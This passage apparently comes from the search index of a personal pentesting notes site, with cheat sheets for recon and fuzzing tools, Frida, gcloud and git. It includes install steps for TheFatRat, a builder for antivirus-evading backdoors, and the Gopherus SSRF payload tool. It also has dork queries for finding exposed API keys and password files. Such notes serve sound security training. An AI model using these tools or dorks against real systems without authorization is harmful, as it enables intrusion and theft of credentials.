    The exiftool output can be organized based on these groups using the\u00a0-g\u00a0or\u00a0-G\u00a0option (ie.\u00a0-g1\u00a0to see family 1 groups, or\u00a0-g3:1\u00a0to see both family 3 and family 1 group names in the output. See the\u00a0-g\u00a0option in the exiftool application documentation for more details, and the\u00a0GetGroup\u00a0function in the ExifTool library for a description of the group families. Note that when writing, only family 0, 1, 2 and 7 group names may be used.

    ","tags":["pentesting","file"]},{"location":"eyewitness/","title":"EyeWitness","text":"

    EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known. EyeWitness is designed to run on Kali Linux.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#installation","title":"Installation","text":"

    Download from: https://github.com/FortyNorthSecurity/EyeWitness.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#basic-usage","title":"Basic usage","text":"

    First, create a file with the target domains, like for instance, listOfdomains.txt.

    Then, run:

    eyewitness --web -f listOfdomains.txt -d path/to/save/\n

    After that you will get a report.html file with the request and a screenshot of those domains. You will also have the source index.html code and the libraries in use.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#proxing-the-request-via-burpsuite","title":"Proxing the request via BurpSuite","text":"
    eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fatrat/","title":"FatRat","text":"

    TheFatRat\u00a0is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android.\u00a0TheFatRat\u00a0Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

    "},{"location":"fatrat/#installation","title":"Installation","text":"
    git clone https://github.com/screetsec/TheFatRat.git\ncd TheFatRat\nchmod +x fatrat setup.sh\nsudo ./setup.sh\n
    "},{"location":"fatrat/#basic-usage","title":"Basic usage","text":"
    # After launching it, browse the menu that fatrat has\ncd TheFatRat\nsudo fatrat\n
    "},{"location":"feroxbuster/","title":"feroxbuster - A web content enumeration tool for not referenced resources","text":"

    feroxbuster is used to perform forced browsing. Forced browsing allows us to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

    Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.

    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#installation","title":"Installation","text":"

    See the repo: https://github.com/epi052/feroxbuster.

    sudo apt update && sudo apt install -y feroxbuster\n
    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#dictionaries","title":"Dictionaries","text":"

    path to dictionary: /etc/feroxbuster/ferox-config.toml

    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#basic-commands","title":"Basic commands","text":"
    # Include headers in the request\nferoxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read urls from STDIN; pipe only resulting urls out to another tool\ncat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy traffic through Burp\nferoxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n\n# Proxy traffic through a SOCKS proxy (including DNS lookups)\nferoxbuster -u http://127.1 --proxy socks5h://127.0.0.1:9050\n\n# Pass auth token via query parameter\nferoxbuster -u http://127.1 --query token=0123456789ABCDEF\n
    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"ffuf/","title":"ffuf - A fast web fuzzer written in Go","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#installation","title":"Installation","text":"

    Download from: https://github.com/ffuf/ffuf

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#basic-commands","title":"Basic commands","text":"
    ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n####### Matchers options #######\n# -mc: Match HTTP status codes, or \"all\" for everything. (default: 200,204,301,302,307,401,403,405)\n# -ml: Match amount of lines in response\n# -mr: Match regexp\n# -ms: Match HTTP response size\n# -mw: Match amount of words in response\n\n####### Filters options #######\n# -fc: Filter HTTP status codes from response. Comma separated list of codes and ranges\n# -fl: Filter by amount of lines in response. Comma separated list of line counts and ranges\n# -fr: Filter regexp\n# -fs: Filter HTTP response size. Comma separated list of sizes and ranges\n# -fw: Filter by amount of words in response. Comma separated list of word counts and ranges\n\n# Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\nffuf -w /path/to/vhost/wordlist -u https://$ip -H \"Host: FUZZ\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.example.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n

    By pressing ENTER during ffuf execution, the process is paused and user is dropped to a shell-like interactive mode: in this mode, filters can be reconfigured, queue managed and the current state saved to disk.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fierce/","title":"fierce - DNS scanner that helps locate non-contiguous IP space and hostnames","text":"

    Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a pre-cursor to nmap, OpenVAS, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware. Originally written by RSnake along with others at http://ha.ckers.org/.

    # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n\n# Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"figlet/","title":"Figlet","text":"","tags":["tools"]},{"location":"figlet/#installation","title":"Installation","text":"
    sudo apt install figlet\n
    ","tags":["tools"]},{"location":"figlet/#basic-commands","title":"Basic commands","text":"
    # Show all fonts\nshowfigfonts\n\n# Usage\nfiglet -f banner \"lalala\"\n# -f font\n# banner is just a font\n# \"lalala\" the text that will be displayed\n\n\n#                                          \n#         ##   #        ##   #        ##   \n#        #  #  #       #  #  #       #  #  \n#       #    # #      #    # #      #    # \n#       ###### #      ###### #      ###### \n#       #    # #      #    # #      #    # \n####### #    # ###### #    # ###### #    # \n
    ","tags":["tools"]},{"location":"file-encryption/","title":"File encryption","text":"

    title: File Encryption: windows and linux author: amandaguglieri draft: false TableOfContents: true tags: - file encryption - windows - linux

    "},{"location":"file-encryption/#file-encryption","title":"File Encryption","text":""},{"location":"file-encryption/#windows","title":"Windows","text":""},{"location":"file-encryption/#invoke-aesencryptionps1-powershell-script","title":"Invoke-AESEncryption.ps1 PowerShell script","text":"

    Invoke-AESEncryption.ps1 PowerShell script

    After the script has been transferred, it only needs to be imported as a module, as shown below.

    PS C:\\htb> Import-Module .\\Invoke-AESEncryption.ps1\n

    This command creates an encrypted file with the same name as the encrypted file but with the extension \".aes.\" Cheat sheet for encrypting and decrypting files:

    ############\n# ENCRYPTION\n############\n# Encrypts the string \"Secret Test\" and outputs a Base64 encoded ciphertext\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Text \"Secret Text\" \n\n# Encrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin\n\n# Decrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin.aes\n
    ############\n# DECRYPTION\n############\n# Decrypts the Base64 encoded string \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\" and outputs plain text.\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Text \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\"\n
    "},{"location":"file-encryption/#linux","title":"Linux","text":"

    See openssl

    # Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iterations counts with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: Specify the entry parameter\n\n# Decrypt a dile with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
    "},{"location":"footprinting/","title":"01. Information Gathering / Footprinting","text":"","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#methodology","title":"Methodology","text":"Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#owasp-reference","title":"OWASP reference","text":"ID WSTG-ID Test Name Objectives Tools 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). Google Hacking Shodan Recon-ng 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. Wappalyzer Nikto 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. Browser Curl Burpsuite/ZAP 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers dnsrecon Nmap 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. Browser Curl Burpsuite/ZAP 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis OWASP ASD Burpsuite/ZAP 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough Burpsuite/ZAP 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. Whatweb Wappalyzer CMSMap 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 NA 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs Network and Security: Reverse proxy, IPS, WAF WAFW00F Nmap","tags":["footprinting","CPTS","eWPT"]},{"location":"fping/","title":"fping - An improved ping tool","text":"

    Linux tool which is an improved version of the ping utility:

    fping -a -g IPRANGE\n# -a: forces the tool to show only alive hosts.\n# -g: tells the tool we want to perform a ping sweep instead of a standard ping.\n

    Also you can use the CIDR notation:

    fping -a -g 10.54.12.0/24\nfping -a -g 10.54.12.0 10.54.12.255\n
    ","tags":["scanning","reconnaissance","ping"]},{"location":"frida/","title":"Frida - A dynamic instrumentation toolkit","text":"

    Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, watchOS, tvOS, Android, FreeBSD, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API. More.

    ","tags":["mobile pentesting"]},{"location":"frida/#installation-and-set-up","title":"Installation and set up","text":"

    Download it:

    pip install frida-tools\npip install frida\nwget https://github.com/frida/frida/releases/download/15.1.14/frida-server-15.1.14-android-x86.xz\n

    Unzip the file with extension xz:

    unxz frida-server-15.1.14-android-x86.xz\n

    Make sure we're connected to the device:

    adb connect 192.168.156.103:5555\n

    Upload frida file to the device:

    adb push frida-server-15.1.14-android-x86 /data/local/tmp/frida-server\n

    We go to the path where we have stored the file:

    adb shell\ncd /data/local/temp\n

    We list contents, see frida-server file, and we change permissions:

    ls -la\nchmod 777 frida-server\n

    Now we can run the binary:

    ./frida-server\n

    From another terminal we can see processes running on the device:

    frida-ps U\n
    ","tags":["mobile pentesting"]},{"location":"frida/#install-burp-certificate-in-frida","title":"Install Burp Certificate in Frida","text":"

    Our goal is to install it at: /system/etc/security/cacerts. Here we can find stored Authority certificates and it 's the place where we will install Burp certificate.

    First, we open Burp > Proxy > Options > Proxy Listener and we click on \"Import / Export CA Certificate\". We save it in DER format to a folder accessible from kali. We can give it the name: cacert.der.

    Second, we convert der format to pem:

    openssl x509 -inform DER -in cacert.der -out cacert.pem\n

    Now, we extract the hash that we will use later on to name the certificate.

    openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\n

    It returns (for instance): 9a5ba575.

    Let's change the name to cacert.pem:

    mv cacert.pem 9a5ba575.0\n

    To act as root we'll run:

    adb root\n

    And to mount again the units:

    adb remount\n

    Netx step will be to upload the certificate 9a5ba575.0 to the SD Card:

    adb push 9a5ba575.0 /sdcard/\n

    Let's go to that directory and move the file to our preferred location:

    adb shell\ncd /sdcard\nls -la\nmv 9a5ba575.0 /system/etc/security/cacerts\n

    Change permissions to the file:

    chmod 644 /system/etc/security/cacerts/9a5ba575.0\n\nIn Burp now we need a Proxy Listener. We will indicate the Host-Only IP that we have in our kali. For instance: 192.168.156.107. Port: 8080.\n\nAnd in the wifi settings of the virtual device running on GenyMotion (for instance a Galaxy6), we need to indicate this same IP on Host-Only mode from our kali.\n
    ","tags":["mobile pentesting"]},{"location":"frida/#basic-commands","title":"Basic commands","text":"
    # Display active processes, and installed\nfrida-ps -Ua\n\n\n# Restaurate class loaders\nJava.perform(function() {\n    var application = Java.use(\"android.com.application\");\n    var classloader;\n    application.attach.overload('android.content.Context').implementation = function(context) {\n        var result = this.attach(context);\n        classloader = context.getClassLoader();\n        Java.classFactory.loader = classloader;\n    return result;\n    }\n})\n\n# Enumerate classes loaded in memory\nJava.perform(function() {\n    Java.enumerateLoadedClasses\n    ({\n        \"onMatch\": function(className) {\n            console.log(className)\n            },\n        \"onComplete\": function(){]\n    })\n})\n\n# Enumerate classes loaded in memory linked to a specific <package>\nJava.enumerateLoadedClasses\n({\n    \"onMatch\": function(className) {\n        if(className.includes(\"<package>\")) {\n            console.log(className);\n        }\n    },\n    \"onComplete\": function(){]\n});\n\n# Android version installed on device\nJava.androidVersion\n\n# Execute a method of an Activity\nJava.choose(\"<Name and path of the activity>\"), {\n    onMatch: function(instance) {\n    // This function will be called for every instance found by frida console.log (Found instance: \"+ instance).\n        instace.<Method name>/<function()>;\n    },\n    onComplete: function(){}\n});\n\n# Save an Activity in a variable\nvar NameofVariable = Java.use(com.android.application.<nameOfActivity>); \n\n# Execute a script js from Frida\nfrida -U com.android.applicationName -l instance.js\n\n# Modify the implementation of a function\nvar activity = Java.use(com.droidhem.basketball.adapters.Game);\nactivity.normalshoot.implementation = function(x,y){\n    //print the original arguments\n    console.log(\"Dentro de normalshoot\");\n    this.score.value += 10000;\n    // in the original code:\n    // this.score += 2;\n}\n
    ","tags":["mobile pentesting"]},{"location":"gcloud-cli/","title":"gcloud CLI","text":"
    # Get a list of images \ngcloud compute images list \n\n\n# PROJECT=<PROJECT> # Replace this with your project id \n# ZONE=<zone>   # Replace this with a GCP zone of your choice \n\n# Launch a GCE instance \ngcloud compute instances create gcp-lab1 \\ \n --project=$PROJECT \\ \n --zone=$ZONE \\ \n --machine-type=f1-micro \\ \n --tags=http-server \\ \n --image=ubuntu-1804-bionic-v20190722a \\ \n --image-project=ubuntu-os-cloud \n\n# Get a list of instances\ngcloud compute instances list\n\n# Filter instances by zone \ngcloud compute instances list --zone=<zone>\n\n\n\n# SSH into the VM. This commands create the pair of keys and all ssh infrastructure needed for the connection\ngcloud compute ssh <instance> --zone=<zone-of-instance> \n\n\n# Open port 80 for HTTP access \ngcloud compute firewall-rules create default-allow-http \\ \n --project=$PROJECT \\ \n --direction=INGRESS \\ \n --action=ALLOW \\ \n --rules=tcp:80 \\ \n --source-ranges=0.0.0.0/0 \\ \n --target-tags=http-server \n\n\n# Run these commands within the VM \nsudo apt-get install -y apache2 \nsudo systemctl start apache2 \n\n\n# Access Apache through the public IP \n# Terminate the instance \ngcloud compute instances delete gcp-lab1 --zone $ZONE \n\n\n# Connect to Google Cloud SQL\ngcloud sql connect <nameOfDatabase>\n\n\n ```\n\n\n\n### Add an image to GCP Container Registry\n\nIn GCP Dashboard go yo Container Registry. First time it will be empty. \n\n```bash\n# Run the below commands in Google Cloud Shell \n\ngcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
    cat <<EOF >>Dockerfile \nfrom busybox:latest \nCMD [\"date\"] \nEOF \n
    # Build your own instance of busybox and name it mybusybox\ndocker build . -t mybusybox \n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n
    # Associate gcp credentials with docker CLI  \ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
    ","tags":["cloud","google cloud platform","gcp"]},{"location":"gcloud-cli/#demo-of-anthos","title":"Demo of Anthos","text":"
    # Run the below commands in the macOS Terminal \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP project ID \nexport REGION=<REGION ID> # Replace this with a valid GCP region \n\ngcloud config set project $PROJECT_ID \ngcloud config set compute/region $REGION \n\n# Enable APIs \ngcloud services enable \\ \n container.googleapis.com \\ \n gkeconnect.googleapis.com \\ \n gkehub.googleapis.com \\ \n cloudresourcemanager.googleapis.com \n\n# Launch GKE Cluster \ngcloud container clusters create cloud-cluster \\ \n    --machine-type=n1-standard-1 \\ \n    --num-nodes=1 \n\n# Launch Minikube. Refer to the docs at https://minikube.sigs.k8s.io/docs/  \nminikube start \n\n# Create GCP Service Account \ngcloud iam service-accounts create anthos-hub \n\n# Add IAM Role to Service Account \ngcloud projects add-iam-policy-binding $PROJECT_ID \\ \n --member=\"serviceAccount:anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n --role=\"roles/gkehub.connect\" \n\n# Download the Service Account JSON Key \ngcloud iam service-accounts keys create \"./anthos-hub-svc.json\" \\ \n  --iam-account=\"anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n  --project=$PROJECT_ID \n\n# Register cluster with Anthos \nURI='gcloud container clusters list --filter='name=cloud-cluster' --uri'\n\ngcloud container hub memberships register cloud-cluster \\ \n        --gke-uri=$URI \\ \n        --service-account-key-file=./anthos-hub-svc.json \n\n# List Membership \ngcloud container hub memberships list \n\n# Register Minikube with Anthos \ngcloud container hub memberships register local-cluster \\ \n --service-account-key-file=./anthos-hub-svc.json \\ \n --kubeconfig=~/.kube/config \\ \n --context=minikube \n\n# List Membership \ngcloud container hub memberships list \n\n# Create Kubernetes Role \n\nkubectl config use-context minikube \n
    cat <<EOF > cloud-console-reader.yaml \nkind: ClusterRole \napiVersion: rbac.authorization.k8s.io/v1 \nmetadata: \n  name: cloud-console-reader \nrules: \n- apiGroups: [\"\"] \n  resources: [\"nodes\", \"persistentvolumes\"] \n  verbs: [\"get\", \"list\", \"watch\"] \n- apiGroups: [\"storage.k8s.io\"] \n  resources: [\"storageclasses\"] \n  verbs: [\"get\", \"list\", \"watch\"] \nEOF \n
    kubectl apply -f cloud-console-reader.yaml \n\n# Create RoleBinding \nkubectl create serviceaccount local-cluster \n\nkubectl create clusterrolebinding local-cluster-anthos-view \\ \n --clusterrole view \\ \n --serviceaccount default:local-cluster \n\nkubectl create clusterrolebinding cloud-console-reader-binding \\ \n --clusterrole cloud-console-reader \\ \n --serviceaccount default:local-cluster \n\n# Get the Token \nSECRET_NAME=$(kubectl get serviceaccount local-cluster -o jsonpath='{$.secrets[0].name}') \n\n# Copy the secret and paste it in the console \nkubectl get secret ${SECRET_NAME} -o jsonpath='{$.data.token}' | base64 --decode  \n\n# Delete Membership \ngcloud container hub memberships delete cloud-cluster \ngcloud container hub memberships delete local-cluster \n\n# Clean up  \ngcloud container clusters delete cloud-cluster --project=${PROJECT_ID} \ngcloud iam service-accounts delete anthos-hub@${PROJECT_ID}.iam.gserviceaccount.com \nminikube delete \n
    ","tags":["cloud","google cloud platform","gcp"]},{"location":"git/","title":"Git - A version controller system for programming","text":"

    Git is\u00a0 a distributed version control system that tracks changes in any set of computer files, usually used for coordinating work among programmers wikipedia

    "},{"location":"git/#install","title":"Install","text":"

    From: https://git-scm.com/

    "},{"location":"git/#git-basic-commands","title":"Git basic commands","text":"

    Go to your prooject folder and, then, initialize a repo with

    git init\n

    Once you do that, you will see a .git folder in your project folder.

    "},{"location":"git/#git-status","title":"git status","text":"

    This tells you what it is not still saved in the repository. These are the \"untrack\" files.

    git status\n
    "},{"location":"git/#git-add","title":"git add","text":"

    \"Git add\" add changed files/folders to the repository staging area of the branch. It tracks them. You can add a single file with:

    git add <file>\n

    You can also add a folder

    git add <folder>\n
    You can add all unstaged files with a dot:

    git add .\n
    "},{"location":"git/#git-rm-cached","title":"git rm --cached","text":"

    You can unstage files from being commited

    git rm --cached <file>\n
    "},{"location":"git/#git-commit","title":"git commit","text":"

    Commit the changes you have staged properly with:

    git commit -m \"message that describes what you have changed\"\n

    To undo the most recent commit we've made:

    git reset --soft HEAD~\n
    "},{"location":"git/#git-config","title":"git config","text":"

    To setup user name and user email:

    git config --global user.name \"NameOfUser\"\ngit config --global user.email \"email@email.com\"\n
    "},{"location":"git/#git-branch","title":"git branch","text":"

    To create a new branch:

    git branch <newBranchName>\n

    To list all existing branches:

    git branch\n

    To switch to a branch:

    git checkout <destinationBranch>\n

    To create a new branch and checkout into it in one command:

    git checkout -b <branchName>\n
    To delete a branch:

    git branch <branchName> -d\n

    If you want to force the deletion (maybe some changes are not staged), then:

    git branch <branchName> -D\n
    "},{"location":"git/#git-merge","title":"git merge","text":"

    Having two branches (main and newbranch), to merge changes contained in newbranch to main branch, go to main branch with \"git checkout main\" and merge the new branch with:

    git merge <newBranch>\n
    "},{"location":"git/#git-log","title":"git log","text":"

    It displays all commits and their commit message. Every commit has an id associated. Yo can use that id for reverting changes.

    git log\n
    "},{"location":"git/#git-revert","title":"git revert","text":"

    It allows us to revert back to a previous version of our project.

    git revert <commitId>\n
    "},{"location":"git/#gitignore","title":".gitignore","text":"

    It's a configuration file that allows you to hide existing files and folders in your repository. Content listed there don't get pushed to a public repository. The file is called .gitignore and has one line per resource to be ignored.

    Also, important, if a file was staged before you will need to remove it from cache...

    "},{"location":"git/#git-remove-cached","title":"git remove --cached","text":"

    To remove from cached files and include it later into the .gitignore file list.

    git remove --cache <fileName>\n
    "},{"location":"git/#git-remote","title":"git remote","text":"

    To check out which remote repository our local repository is connected to:

    git remote\n

    To connect my local project folder to the github repo.

    git remote add origin https://github.com/username/reponame.git\n
    "},{"location":"git/#git-push","title":"git push","text":"

    To push our local changes into the connected github repo:

    git push -u origin main\n
    Note: origin references the connection, and main is because we are in the main branch (that's what we are pushing). The first git push is a little different from future gitpushes, since we'll need to use the -u gflag in order to set origin as the defaulto remote repository so we won't have to provide its name every time.

    "},{"location":"git/#some-tricks","title":"Some tricks","text":""},{"location":"git/#counting-commits","title":"Counting commits","text":"

    git rev-list --count\n
    If you want to specify a branch name:
    git rev-list --count <branch>\n

    "},{"location":"git/#backing-up-untracked-files","title":"Backing-up untracked files","text":"

    Git, along with some Bash command piping, makes it easy to create a zip archive for your untracked files.

    $ git ls-files --others --exclude-standard -z |\\\nxargs -0 tar rvf ~/backup-untracked.zip\n

    "},{"location":"git/#viewing-a-file-of-another-branch","title":"Viewing a file of another branch","text":"

    Sometimes you want to view the content of the file from another branch. It's possible with a simple Git command, and without actually switching your branch.

    Suppose you have a file called README.md, and it's in the main branch. You're working on a branch called dev: git show main:README.md

    git show <branchName>:<fileName>\n

    "},{"location":"git/#pentesting-git","title":"Pentesting git","text":"

    Source: https://thecyberpunker.com/tools/git-exposed-pentesting-git-tools/

    "},{"location":"git/#git-dumper","title":"git-dumper","text":"

    https://github.com/arthaud/git-dumper

    "},{"location":"github-dorks/","title":"Github Dorks","text":"

    Go to github.

    Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gobuster/","title":"gobuster","text":"

    Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster:

    gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
    "},{"location":"gobuster/#enumerate-subdomains","title":"Enumerate subdomains:","text":"

    From HackTheBox machine - Three:

    gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
    "},{"location":"gobuster/#examples-from-real-life","title":"Examples from real life","text":"
    gobuster dir -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php -t 20 -k\n\n# dir to search for directories\n# -t number of concurrent threads\n# -k to avoid error message about certificate: invalid certificate: x509: certificate has expired or is not yet valid\n# -x to indicate an extension for the file\n# -w to indicate a dictionary or wordlist\n\n\n\n# -l Display the length of the response\n# -s Show an especific status code\n# -r Follow redirect\n
    "},{"location":"google-dorks/","title":"Google Dorks","text":"

    Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.

    This is an awesome database with more than 7K googledork entries: https://www.exploit-db.com/google-hacking-database.

    Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys. site:*.domain.com It enumerates subdomains for the given domain \"domain.com\" site:*.domain.com filetype:pdf sales It searches for pdf files named \"sales\" in all subdomains. cache:domain.com/page It will display the google.com cache of that page. inurl:passwd.txt It retrieves pages that contains that in the url.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gopherus/","title":"Gopherus - a tool for exploiting SSRF","text":"

    This tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution)

    ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"gopherus/#installation","title":"Installation","text":"
    git clone https://github.com/tarunkant/Gopherus.git\n\ncd Gopherus\nchmod +x install.sh\n
    ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"grep/","title":"grep","text":"

    It filters out output

    # -C return 5 lines up and 5 lines down the line where the criteria is matched\ncat text.txt  | grep -C 5 \"password\"`\n
    ","tags":["pentesting","reconnaissance"]},{"location":"hashcat/","title":"Hashcat - A password recovery tool","text":"

